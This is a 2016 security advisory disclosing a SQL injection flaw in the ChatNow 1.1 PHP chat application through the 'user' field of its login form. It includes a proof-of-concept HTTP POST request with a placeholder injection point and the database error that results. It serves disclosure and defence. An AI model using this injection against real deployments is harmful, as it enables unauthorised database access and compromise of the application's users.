===================================================== [#] Exploit Title : ChatNow 1.1 - SQL Injection Web Vulnerability [#] Date Discovered : 2016-11-17 [#] Affected Product(s): chatNow v1.1 - Content Management System [#] Exploitation Technique: Remote [#] Severity Level: High [#] Tested OS : Windows 10 ===================================================== [#] Product & Service Introduction: =================================== Chat Open Source desenvolvido com PHP e MySQL. Com suporte para envio de videos do Youtube e imagens. Construido com jQuery. (Copy of the Vendor Homepage: http://chatnow.thiagosf.net/ ) [#] Technical Details & Description: ==================================== A remote sql injection web vulnerability has been discovered in the official chatNow v1.1 content management system. The web vulnerability allows remote attackers to execute own malicious sql commands to compromise the application. The sql injection vulnerability is located in input name `user` which is found in the connection form. Remote attackers are able to execute own sql commands, the attack vector of the vulnerability is application-side and the request method to inject is POST. Request Method(s): [+] POST Vulnerable Input (Name): [+] user [#] Proof of Concept (PoC): =========================== The remote sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account and without user interaction. For security demonstration or to reproduce the sql-injection web vulnerability follow the provided information and steps below to continue. --- PoC Session Logs [POST]--- Status: 200 [OK] Host: localhost/chatNow/ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/chatNow/chat/login.php Cookie: PHPSESSID=3g7cs1mammh9p767oed1v187t0; __utma=32540652.120788788.1479381166.1479381166.1479381166.1; __utmb=32540652.5.10.1479381166; __utmc=32540652; __utmz=32540652.1479381166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1 Connection: keep-alive Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 36 - POST Method: user=[SQL INJECTION HERE]id_room=14&captcha=5253 --- PoC Error Logs --- SELECT * FROM chat_users WHERE user = "1"'" ORDER BY id DESC You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''" ORDER BY id DESC' at line 1 [#] Vulnerability Disclosure Timeline: ====================================== 2016-11-17 : Discovery of the Vulnerability 2016-11-17 : Contact the Vendor (No Response) 2016-11-28 : Public Disclosure [#] Disclaimer: =============== Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. Domain: www.zwx.fr Contact: msk4@live.fr Social: twitter.com/XSSed.fr Feeds: www.zwx.fr/feed/ Advisory: www.vulnerability-lab.com/show.php?user=ZwX packetstormsecurity.com/files/author/12026/ cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/ iedb.ir/author-ZwX.html 0day.today/author/27461 Copyright (c) 2016 | ZwX - Security Researcher (Software & web application) # Iranian Exploit DataBase = http://IeDb.Ir [2016-11-30]